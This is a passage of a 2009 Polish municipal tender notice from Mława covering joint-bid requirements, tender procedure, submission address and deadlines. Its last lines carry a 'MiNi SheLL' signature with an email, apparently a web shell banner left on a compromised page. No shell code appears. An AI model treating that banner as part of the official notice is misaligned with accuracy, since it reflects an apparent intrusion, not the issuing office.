2.	Zamawiający wzywa wykonawców w wyznaczonym przez siebie terminie do złożenia wyjaśnień dotyczących oświadczeń i dokumentów.
    
VII.	OFERTA WSPÓLNA
1.	Zamawiający dopuszcza możliwość składania oferty przez dwóch lub więcej wykonawców (w ramach oferty wspólnej w rozumieniu art. 23 ustawy) 
pod warunkiem, że taka oferta spełniać będzie następujące wymagania:
1.1.	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia Wykonawcy-Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich   w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego;
1.2.	Oryginał pełnomocnictwa powinien być załączony do oferty i zawierać
w szczególności wskazanie:
a)	postępowania o zamówienie publiczne, którego dotyczy,
b)	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,
c)	ustanowionego Wykonawcy - Pełnomocnika oraz zakres jego umocowania;
1.3.	Pełnomocnictwo musi być udzielone przez wszystkich wykonawców ubiegających się wspólnie o zamówienie, w tym Wykonawcę - Pełnomocnika. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji wykonawców. Stosowne odpisy z rejestru           lub ewidencji, o których mowa w rozdziale VI SIWZ, muszą zostać dołączone do oferty  przez wszystkich wykonawców;
1.4.   Oświadczenie, o którym mowa w pkt 1 ppkt.1 rozdziału VI SIWZ, jak również wypełniony formularz oferty - załącznik nr 1 do SIWZ, składa i podpisuje w imieniu wszystkich wykonawców, Wykonawca - Pełnomocnik wpisując w miejscu przeznaczonym na podanie nazwy i adresu Wykonawcy, nazwy i adresy wszystkich wykonawców składających ofertę wspólną z zaznaczeniem Wykonawcy - Pełnomocnika;
1.5.   Oświadczenia (inne niż wymienione w pkt 1.4. rozdziału VII SIWZ), formularze, dokumenty sporządzone na załączonych do SIWZ wzorach muszą być podpisane przez Wykonawcę - Pełnomocnika. Wszystkie kserokopie dokumentów załączone do oferty muszą być opisane -za zgodność z oryginałem- i podpisane przez Wykonawcę-Pełnomocnika;
1.6.    	Oświadczenie, o którym mowa w pkt. 1 ppkt.2 rozdziału VI  SIWZ, podpisują 
w swoim imieniu wszyscy Wykonawcy (w tym Wykonawca - Pełnomocnik) składający ofertę wspólną. Każdy Wykonawca składa oświadczenie na odrębnym formularzu;
1.7.	 Dokumenty wymienione w pkt.1 ppkt.3,4,5,13,14 rozdziału VI SIWZ, muszą być załączone do oferty dla wszystkich wykonawców składających ofertę wspólną,            a w przypadku załączenia ich kserokopii, muszą być opisane -za zgodność                z oryginałem- i podpisane przez Wykonawcę - Pełnomocnika;
2.	Wszelka korespondencja oraz rozliczenia dokonywane będą przez zamawiającego wyłącznie z Wykonawcą - Pełnomocnikiem.
3.	Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mlawa.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Mławie
ul. Stary Rynek 19
06-500 Mława
pokój nr 19.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.03.2009 godzina 10:00, miejsce: Urząd Miasta w Mławie
ul. Stary Rynek 19
06-500 Mława
pokój nr 19.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com